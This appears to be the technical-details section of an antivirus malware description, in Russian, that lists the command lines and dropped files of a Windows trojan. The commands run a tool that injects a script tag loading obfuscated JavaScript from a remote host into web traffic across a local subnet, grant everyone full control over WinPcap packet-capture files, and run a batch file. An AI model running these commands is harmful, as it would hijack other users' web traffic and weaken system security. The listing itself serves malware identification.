Техническая информация
- '<SYSTEM32>\360uciv.exe' -idx 0 -ip 10.0.0.2-10.0.0.254 -port 80 -insert "<script language=JavaScript src=http://b%###.K%77%69k.%54o/tj.js></script>"
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\wpcap.dll /e /p everyone:f
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\npptools.dll /e /p everyone:f
- '<SYSTEM32>\cmd.exe' /c c:\sssa.bat
- '<SYSTEM32>\cacls.exe' <DRIVERS>\npf.sys /e /p everyone:f
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\Packet.dll /e /p everyone:f
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\WanPacket.dll /e /p everyone:f
- <DRIVERS>\npf.sys
- <SYSTEM32>\360uciv.exe
- C:\sssa.bat
- <SYSTEM32>\Packet.dll
- <SYSTEM32>\WanPacket.dll
- <SYSTEM32>\wpcap.dll